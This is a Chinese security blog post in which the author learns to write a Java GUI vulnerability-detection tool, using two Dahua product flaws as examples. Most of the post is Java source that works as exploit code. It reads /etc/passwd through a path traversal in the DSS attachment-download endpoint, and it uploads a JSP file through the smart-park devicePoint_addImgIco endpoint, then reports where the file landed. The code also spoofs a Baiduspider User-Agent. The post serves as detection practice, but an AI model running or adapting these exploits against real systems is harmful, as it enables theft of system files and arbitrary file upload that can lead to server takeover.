java图形化工具编写初试

admin 2024年5月15日21:01:54评论3 views字数 2758阅读9分11秒阅读模式

 照虎画猫——用WgpSec 说书人师傅的‘用友NC系列检测利用工具’结合本人为数不多的java基础再结合gpt,学习了一下java图形化工具的编写,实现了最基础的漏洞检测功能........

用大华的两个漏洞为例,分别试了POST请求和GET请求

java图形化工具编写初试

java图形化工具编写初试

01

大华智慧园区devicePoint_addImgIco文件上传

java图形化工具编写初试

02

大华DSS文件下载漏洞

java图形化工具编写初试

03、总结

凑个字数。。。。。。

public class check {    public String checkAction(Map deserializeMap, String vulName, String url) throws IOException {        String result;        if ("dahua_dss_fileDown".equals(vulName)) {            result = dahua_dss_fileDown(url);        } else if ("大华智慧园区文件上传".equals(vulName)) {            result = zhihuiyuanqu_upload(url);        } else if (vulName.contains("xxx")){            String path = (String) deserializeMap.get(vulName);            result = deserializeAction(url, path, vulName);        }else {            result = "该poc暂未收录";        }        return result;    }    public String dahua_dss_fileDown(String url) {        Map<String, String> headers = new HashMap<>();        headers.put("User-Agent", "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");        Response response = null;        try {            String payload = "portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd";            response = httpRequest.get(url + payload,headers);            String statusCode = String.valueOf(response.code());            String responseBody = response.body().string();            if ("200".equals(statusCode) && responseBody.contains("root")) {               return "[+] 漏洞存在!!!!";            } else {                return "[-] 漏洞不存在";            }        } catch (IOException e) {            return "[-]请求失败:" + e.getMessage();        } finally {            if (response != null) {                response.close();            }        }    }    public String zhihuiyuanqu_upload(String url) {        Map<String, String> headers = new HashMap<>();        headers.put("User-Agent", "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");//        headers.put("Content-Type","multipart/form-data; boundary=f3aeb22be281d77542546a2f71e20982");        Response response = null;        String payload = "emap/devicePoint_addImgIco?hasSubsystem=true";        String data = "<%out.println("vultest");%>";        RequestBody requestBody = new MultipartBody.Builder()                .setType(MultipartBody.FORM)                .addFormDataPart("upload", "a.jsp",                        RequestBody.create(MediaType.parse("application/octet-stream"), data))                .build();        System.out.println(requestBody);        try {            response = httpRequest.post(url + payload,headers,requestBody);//            System.out.println(response);            String statusCode = String.valueOf(response.code());            String responseBody = response.body().string();//            System.out.println(responseBody);            if ("200".equals(statusCode) && responseBody.contains("on.jsp")) {                String pattern = "ico_res_[0-9a-fA-F]+_on.jsp";                Pattern r = Pattern.compile(pattern);                Matcher m = r.matcher(responseBody);                if (m.find()){                    System.out.println(url+"upload/emap/society_new/"+m.group());                }                return "[+] 漏洞存在!!!!n"+"文件路径:"+url+"upload/emap/society_new/"+m.group();            } else {                return "[-] 漏洞不存在";            }        } catch (IOException e) {            return "[-]请求失败:" + e.getMessage();        } finally {            if (response != null) {                response.close();            }        }    }    public String deserializeAction(String url, String path, String vulName){        return url+vulName+path;    }}

大佬的代码:https://github.com/wgpsec/YongYouNcTool

菜鸡的代码:https://github.com/ab0ne/test

原文始发于微信公众号(fly的渗透学习笔记):java图形化工具编写初试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月15日21:01:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   java图形化工具编写初试https://cn-sec.com/archives/2052255.html

发表评论

匿名网友 填写信息